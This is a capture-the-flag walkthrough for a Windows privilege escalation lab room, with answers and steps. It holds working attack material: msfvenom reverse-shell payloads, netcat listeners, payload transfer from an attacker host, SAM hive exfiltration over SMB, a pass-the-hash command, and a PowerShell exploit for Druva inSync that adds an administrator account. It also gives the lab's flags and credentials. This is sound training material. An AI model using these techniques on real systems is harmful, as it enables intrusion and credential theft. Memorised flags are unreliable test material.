Windows Privilege Escalation
This guide contains the answer and steps necessary to get to them for the Windows Privilege Escalation room.
Table of contents
- Windows Privilege Escalation
- Harvesting Passwords from Usual Spots
- Other Quick Wins
- Abusing Service Misconfigurations
- Abusing dangerous privileges
- Abusing vulnerable software
- Tools of the Trade
Windows Privilege Escalation
- Users that can change system configurations are part of which group?
This answer can be found in the text.
Click for answer
Administrators
- The SYSTEM account has more privileges than the Administrator user (aye/nay)
This answer can be found in the text.
Click for answer
aye
Harvesting Passwords from Usual Spots
- A password for the julia.jones user has been left on the Powershell history. What is the password?
We can use the following cmd command to list the powershell history.
Click for answer
ZuperCkretPa5z
- A web server is running on the remote host. Find any interesting password on web.config files associated with IIS. What is the password of the db_admin user?
First we open the config file located at: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config. We then look for any mentions of the account db_admin.
Click for answer
098n0x35skjD3
- There is a saved password on your Windows credentials. Using cmdkey and runas, spawn a shell for mike.katz and retrieve the flag from his desktop.
Looking through the stored credentials, we can see mikes credentials are indeed on the system.
Now we can spawn a shell under this user and view the flag.
Click for answer
THM{WHAT_IS_MY_PASSWORD}/details>
- Retrieve the saved password stored in the saved PuTTY session under your profile. What is the password for the thom.smith user?
We can use the following command to view stored credentials in Putty.
Click for answer
CoolPass2021
Other Quick Wins
- What is the taskusr1 flag?
First we query the task scheduler to find more information on the misconfigured task.
Using icacls we can see the permission we have to modify this file. Looks like we can edit it.
Now lets edit the bat file to execute our reverse shell.
Last thing to do, is set up our listener and run the task manually.
Now we can navigate to the users desktop and read the flag.
Click for answer
THM{TASK_COMPLETED}
Abusing Service Misconfigurations
- Get the flag on svcusr1's desktop.
Lets first query the service configuration and see if we have permission to modify the executable.
Looks like we can. Now we can make our reverse payload with msfvenom.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.18.78.136 LPORT=1337 -f exe-service -o rev-svc.exe
python3 -m http.server 8080
nc -nlvp 1337
After setting up our http server and listener we can use powershell on the target system to transfer the file.
Now we can create a backup of the original executabel and copy our own into the folder.
move WService.exe WService.exe.bkp
move C:\Users\thm-unpriv\rev-svc.exe WService.exe
icacls WService.exe /grant Everyone:F
The last thing to do, is stopping the service and then restarting it.
Now we can look for the flag on the users desktop.
Click for answer
THM{AT_YOUR_SERVICE}
- Get the flag on svcusr2's desktop.
We will first check the the permissions for the installation path for the "disk sorter enterprise" service.
Now we can create another reverse shell to use. Then we transfer it over to the target system and move in to the correct folder. Lastly, we must give everyone permission to use the file.
msfvenom -p windows/x64/shell_reverse_tcp lhost=10.18.78.136 lport=1337 -f exe-service -o rev-svc2.exe
python3 -m http.server 8080
wget 10.18.78.136:8080/rev-svc2.exe -o rev-svc2.exe
move C:\Users\thm-unpriv\rev-svc2.exe Disk.exe
icacls C:\MyPrograms\Disk.exe /grant Everyone:F
Then we set up our listener and stop/start the service to receive a connection.
Now, we only have to look for and read the flag.
Click for answer
THM{QUOTES_EVERYWHERE}
- Get the flag on the Administrator's desktop.
First we check the permission for the service DACL configuration using Sysinternals suite.
Looks like we (BUILTIN\Users) have permission (SERVICE_ALL_ACCESS) to change the configuration.
Now we can create another reverse shell to use. Then we transfer it over to the target system and move in to the correct folder. Lastly, we must give everyone permission to use the file.
msfvenom -p windows/x64/shell_reverse_tcp lhost=10.18.78.136 lport=1337 -f exe-service -o rev-svc3.exe
python3 -m http.server 8080
wget 10.18.78.136:8080/rev-svc2.exe -o rev-svc3.exe
icacls C:\Users\thm-unpriv\rev-svc3.exe /grant Everyone:F
Then we set up our listener and stop/start the service to receive a connection.
Now, we only have to look for and read the flag.
Click for answer
THM{INSECURE_SVC_CONFIG}
Abusing dangerous privileges
In this task we will use three different methods to get adminstrator privileges. After that it is trivial to find the flag.
- Get the flag on the Administrator's desktop.
SeBackup / SeRestore
Checking for privileges with:
Now that we know we can read/write files we can copy the SYSTEM and SAM hives to our account folder.
Now we start a SMB server on our attack machine using impacket and transfer the files.
impacket-smbserver -smb2support -username THMBackup -password CopyMaster555 public share
copy sam.hive \\10.18.78.136\public
copy system.hive \\10.18.78.136\public
Again using impacket we can now extract the administrators hash from these files.
With this hash we can perform a Pash the Hash attack on the target machine.
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:8f81ee5558e2d1205a84d07b0e3b34f5 Administrator@10.10.8.101
SeTakeOwnership
We can use this to take ownership of the Utilman.exe executable as it runs with SYSTEM privileges and replace it with a copy of cmd.exe.
Locating the executables in C:\Windows\system32, we can use the following commands.
Now we have successfully taken owners ship of utilman, gotten full permissions, and replaced it with 'cmd.exe`.
Now we can lock the screen and access ease of accces, which will spawn a command shell instead.
SeImpersonate / SeAssignPrimaryToken
For this we abuse the webshell we currently have running whose user has these privileges set. Checking with whoami /priv should confirm this.
Next, we need to start a listener on our machine.
Now we run RogueWinRM to execute netcat which should connect to our machine with a command shell.
Click for answer
THM{SEFLAGPRIVILEGE}
Abusing vulnerable software
- Get the flag on the Administrator's desktop.
We first use wmic to see which programs are installed. Then we can investigate which one we can abuse.
In this exercise we use the vulnerable Druva InSync. We will modify the provided exploit to add the pwnd user to the administrators group.
$ErrorActionPreference = "Stop"
$cmd = "net user pwnd /add & net localgroup administrators pwnd /add"
$s = New-Object System.Net.Sockets.Socket(
[System.Net.Sockets.AddressFamily]::InterNetwork,
[System.Net.Sockets.SocketType]::Stream,
[System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)
$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");
$length = [System.BitConverter]::GetBytes($command.Length);
$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)
Remember to save this file as .ps1. Now we can run this script using powershell.
We can check if this has worked by looking up the user.
To get to the flag, we should open a command prompt as adminstrator. When asked for credentials, we choose pwnd and can leave the password blank (as we didn't specify any).
Click for answer
THM{EZ_DLL_PROXY_4ME}